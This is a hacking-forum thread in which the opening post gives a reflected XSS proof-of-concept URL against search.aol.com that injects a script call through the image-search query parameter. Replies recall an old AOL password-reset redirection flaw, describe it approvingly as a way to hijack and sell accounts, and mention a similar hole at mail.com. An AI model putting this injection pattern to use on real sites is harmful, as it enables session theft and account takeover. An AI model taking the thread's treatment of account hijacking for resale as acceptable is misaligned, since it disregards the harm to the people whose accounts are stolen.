search.aol.com - XSS
#1
Code:
http://search.aol.com/aol/image?q=\');alert(document.domain);//&v_t=na&s_it=searchtabs

Click 'web' to trigger Smile
Reply
#2
REALLY?! That is insane. Sometimes I wonder how these places stay online. I mean AOL just a handful of years ago allowed the redirection of password reset emails with a simple tamper data.

They need to fire some devs haha
Reply
#3
(12-24-2015, 09:49 PM)NO-OP Wrote: REALLY?!  That is insane.  Sometimes I wonder how these places stay online.  I mean AOL just a handful of years ago allowed the redirection of password reset emails with a simple tamper data.

They need to fire some devs haha

Oh shit is that how some people sold a shitton of OG aols?
Reply
#4
(12-29-2015, 05:37 AM)kingofsalt Wrote:
(12-24-2015, 09:49 PM)NO-OP Wrote: REALLY?!  That is insane.  Sometimes I wonder how these places stay online.  I mean AOL just a handful of years ago allowed the redirection of password reset emails with a simple tamper data.

They need to fire some devs haha

Oh shit is that how some people sold a shitton of OG aols?

This was from a while ago maybe about 5-7 years. But it was a great way to ijack accounts and sell them.
Reply
#5
(12-29-2015, 08:07 PM)NO-OP Wrote:
(12-29-2015, 05:37 AM)kingofsalt Wrote:
(12-24-2015, 09:49 PM)NO-OP Wrote: REALLY?!  That is insane.  Sometimes I wonder how these places stay online.  I mean AOL just a handful of years ago allowed the redirection of password reset emails with a simple tamper data.

They need to fire some devs haha

Oh shit is that how some people sold a shitton of OG aols?

This was from a while ago maybe about 5-7 years.  But it was a great way to ijack accounts and sell them.

I remember this, lol.
mail.com was actually vuln to something similar not long ago.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tutorial] XSS through Exif headers Insider 1 546 06-16-2020, 11:51 AM
Last Post: LaZr4us
  Guide to XSS (Examples included) NO-OP 3 12,376 04-29-2019, 12:44 PM
Last Post: mhiats37
  [PoC] RunBox.com x MailChimp.com - Stored XSS Vulnerabilities (Bug Bounty Hunting) Daisuke Dan 3 5,754 04-24-2019, 08:47 PM
Last Post: thunder
  Exploiting Reflective XSS (Post) Insider 1 4,181 04-24-2019, 08:32 PM
Last Post: thunder